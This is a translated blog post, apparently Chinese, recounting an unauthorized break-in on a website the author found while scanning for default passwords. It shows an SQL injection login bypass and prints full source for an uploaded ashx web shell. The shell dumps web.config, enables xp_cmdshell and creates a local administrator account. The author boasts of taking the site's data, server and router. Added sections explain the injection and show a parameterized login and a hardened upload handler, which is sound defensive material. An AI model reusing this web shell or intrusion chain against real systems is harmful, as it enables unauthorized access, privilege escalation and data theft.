The first thing I want to say is that it is not the language a program is written in that is unsafe; it comes down to how the person writing the code writes the program.
A few days ago I went to do some research at a client's site and found that the customer's surveillance system was a Hikvision video recorder, and the default username was admin with password 12345. When I came back I played a game to see how many people use the default password, so I wrote a scanning program, quickly scanned a large number of sites, and found plenty that were still using the default username and password.
After playing for two days I found nothing fun, so I looked through the scan records, saw some backend login addresses, and tested them one by one, and then found this site:
In the beginning I was testing weak passwords: admin, admin, etc. I tried a few at random without success, so I started testing for SQL injection. For the user name I entered 1' or 1=1--, for the password I casually entered a 1, and logged in. Incredibly, the login succeeded....
But I found that there was an error after logging in, and thought the problem might be with the user name, so I looked around the page to see which user I had logged in as, and finally, inside a message someone had written, I saw
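Why the login in the post worked, as an added example that is not code from the original post or the target site: a login check written the way a page that falls to 1' or 1=1-- must be, beside the parameterized version that does not. The table name Users, its two columns, and connStr are assumptions made for the example.

```csharp
using System;
using System.Data.SqlClient;

// Added example, not the author's code. Assumes a table Users(UserName, Password)
// and an ADO.NET connection string in connStr; both are hypothetical.
public static class LoginDemo
{
    // Vulnerable: untrusted input is concatenated into the query text. With
    // userName = "1' or 1=1--" and password = "1" the statement becomes
    //   SELECT COUNT(*) FROM Users WHERE UserName='1' or 1=1--' AND Password='1'
    // The -- comments out the password check and "or 1=1" makes the WHERE
    // clause true for every row, so the count is never zero.
    public static string BuildVulnerableQuery(string userName, string password)
    {
        return "SELECT COUNT(*) FROM Users WHERE UserName='" + userName +
               "' AND Password='" + password + "'";
    }

    public static bool LoginVulnerable(string connStr, string userName, string password)
    {
        using (var con = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(BuildVulnerableQuery(userName, password), con))
        {
            con.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Fixed: the SQL text is a constant; user input travels as typed parameters
    // and cannot change the statement's structure. "1' or 1=1--" is now just a
    // user name that does not exist, so the count is zero and login fails.
    public static bool LoginSafe(string connStr, string userName, string password)
    {
        const string sql = "SELECT COUNT(*) FROM Users WHERE UserName=@u AND Password=@p";
        using (var con = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, con))
        {
            cmd.Parameters.Add("@u", System.Data.SqlDbType.NVarChar, 64).Value = userName;
            cmd.Parameters.Add("@p", System.Data.SqlDbType.NVarChar, 128).Value = password;
            con.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

The parameterized form closes the injection; a real login page would also compare a salted hash rather than the stored password itself, which is a separate problem from the one the post describes.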
Of course, if the intrusion only got this far you would absolutely call it weak... In fact I of course took his data and program... Of course it is best to take his server, and his server was doing port mapping, so I took his router as well, and then did not continue further. Of course I could have continued, for example DNS hijacking on the router, page redirection, port mirroring and so on.
Next I will introduce the main intrusion page: the file upload page.
I wrote an ashx page and uploaded it.
The code is very simple: it reads the site's Web.config file and outputs it as text.
Let me first describe the simple intrusion process:
1. Read web.config to get the database connection string.
2. Use SQL Server to execute commands and add a Windows user (because the web site runs as the IIS user by default, which has no permissions for networking and the like, while the SQL Server service runs as a local service account with high privileges).
Here is the code of the ashx file I uploaded:
    <%@ WebHandler Language="C#" Class="Textld" %>

    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    public class Textld : IHttpHandler
    {
        // VBScript that creates a local user "test" with password "1234" and adds it
        // to the local Administrators group through the WinNT ADSI provider.
        private const string AddAdminVbs =
            "Set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")\r\n" +
            "os=\"WinNT://\"&wsnetwork.ComputerName\r\n" +
            "Set ob=GetObject(os)\r\n" +
            "Set oe=GetObject(os&\"/Administrators,group\") 'admin group\r\n" +
            "Set od=ob.Create(\"user\",\"test\") 'create user\r\n" +
            "od.SetPassword \"1234\" 'set password\r\n" +
            "od.SetInfo\r\n" +
            "Set of=GetObject(os&\"/test\",user)\r\n" +
            "oe.Add os&\"/test\"";

        // Writes the script to D:\1.vbs and runs it inside the IIS worker process.
        // That only works if the worker process already has the right to add users,
        // so ProcessRequest below does not call it. (Write first, then start.)
        public void CreateLocalUser()
        {
            System.IO.File.WriteAllText(@"D:\1.vbs", AddAdminVbs);
            System.Diagnostics.Process.Start(@"D:\1.vbs");
        }

        // Dumps web.config, which holds the connection strings, as plain text.
        public void ShowWebConfig(HttpContext context)
        {
            context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
        }

        // Drops the script into the web root so SQL Server can reach it by path.
        public void WriteVbs(HttpContext context)
        {
            System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), AddAdminVbs);
        }

        public void ExecuteSql(string connection, string sql)
        {
            using (SqlConnection con = new SqlConnection(connection))
            using (SqlCommand cmd = new SqlCommand(sql, con))
            {
                con.Open();
                cmd.ExecuteNonQuery();
            }
        }

        public void ProcessRequest(HttpContext context)
        {
            context.Response.ContentType = "text/plain";
            ShowWebConfig(context);   // always show the config first
            try
            {
                // ?Connection=<connection string taken from web.config>&Method=1|2|3
                var connection = context.Request.QueryString["Connection"];
                switch (context.Request.QueryString["Method"])
                {
                    case "1":
                        WriteVbs(context);
                        break;
                    case "2":
                        // enable xp_cmdshell in the database
                        ExecuteSql(connection, "sp_configure 'show advanced options', 1; reconfigure;");
                        ExecuteSql(connection, "sp_configure 'xp_cmdshell', 1; reconfigure;");
                        break;
                    case "3":
                        // run the script under the SQL Server service account
                        ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
                        break;
                    default:
                        break;   // no method given: only the web.config dump above
                }
            }
            catch (Exception ex)
            {
                context.Response.Write(ex.Message);
            }
            context.Response.End();
        }

        public bool IsReusable
        {
            get { return false; }
        }
    }
Then one execution and the server was taken down by me... An administrator user named test with password 1234 was created, and then I tested the remote desktop connection.
And what to do next, as everyone knows....
Of course, even if you do not take down the server, once you can run your own code on it... what bad things can't be done... Of course I only tested feasibility; even without taking the server, executing SQL statements to download a backup of his database is a matter of minutes, isn't it?
Well, let me conclude this intrusion. The main vulnerability is actually not his SQL injection (personally I feel so; of course it was the fuse) but the file upload. In the file upload function, most programmers save the file uploaded by the client into a folder under the site directory without doing any processing, and this is the main entrance that led to his server being taken down by me.
So I would advise everyone to handle file uploads and file processing properly; as for exactly how, you smart people surely have plenty of methods...
With only a primary school education I can't afford to be hurt.... Hey... forgive me for not being a good writer. You'll see -.-!
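An added example of the processing the post says is missing, not code from the original post or from the target site: an ashx upload handler that checks the file before saving it and keeps it out of the site directory, so an uploaded .ashx can never be requested and executed. The form field name "file", the appSetting "UploadRoot", the size limit and the allowed extensions are assumptions made for the example.

```csharp
<%@ WebHandler Language="C#" Class="SafeUpload" %>

using System;
using System.IO;
using System.Linq;
using System.Web;

// Added example, not the author's code. Assumes an appSetting "UploadRoot" that
// points at a directory outside the web root (hypothetical) and a multipart form
// field named "file".
public class SafeUpload : IHttpHandler
{
    // Allowlist of extensions. Anything IIS could execute (.ashx, .aspx, .asmx,
    // .config, ...) is rejected simply by not being on the list.
    static readonly string[] Allowed = { ".jpg", ".jpeg", ".png", ".gif", ".pdf" };
    const long MaxBytes = 5 * 1024 * 1024;

    // Validation is kept apart from the HTTP plumbing so it can be reviewed and
    // unit-tested on its own. Returns the server-chosen file name or throws.
    public static string ValidateAndName(string clientFileName, long length)
    {
        if (length <= 0 || length > MaxBytes)
            throw new ArgumentException("bad size");

        // Path.GetFileName drops any directory part the client sent (..\..\web.config).
        // Only the last extension counts, and it must be on the allowlist.
        string ext = Path.GetExtension(Path.GetFileName(clientFileName ?? "")).ToLowerInvariant();
        if (!Allowed.Contains(ext))
            throw new ArgumentException("extension not allowed");

        // The stored name is ours, not the client's: the attacker controls neither
        // the base name nor the extension of what lands on disk.
        return Guid.NewGuid().ToString("N") + ext;
    }

    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        HttpPostedFile f = context.Request.Files["file"];
        if (f == null)
        {
            context.Response.StatusCode = 400;
            context.Response.Write("no file");
            return;
        }

        // f.ContentType comes from the client and is ignored on purpose; only the
        // allowlisted extension and the server-side name decide what is saved.
        try
        {
            string name = ValidateAndName(f.FileName, f.ContentLength);

            string root = System.Web.Configuration.WebConfigurationManager.AppSettings["UploadRoot"];
            if (string.IsNullOrEmpty(root))
                throw new InvalidOperationException("UploadRoot is not configured");

            // Outside the site directory, so no URL maps to the file and IIS never
            // hands it to a script handler; the application serves it back, if at
            // all, through its own download code.
            f.SaveAs(Path.Combine(root, name));
            context.Response.Write(name);
        }
        catch (ArgumentException ex)
        {
            context.Response.StatusCode = 400;
            context.Response.Write(ex.Message);
        }
    }

    public bool IsReusable { get { return true; } }
}
```

Three properties do the work here: the extension comes from an allowlist rather than a blocklist, the name on disk is generated by the server, and the directory is not under the web root. Any one of them alone would have stopped the uploaded ashx in the post from being reachable as a page; together they also cover renaming tricks and content that only claims to be an image. Checking the first bytes of image uploads against their format's magic numbers is a further step if the files are ever served back to users.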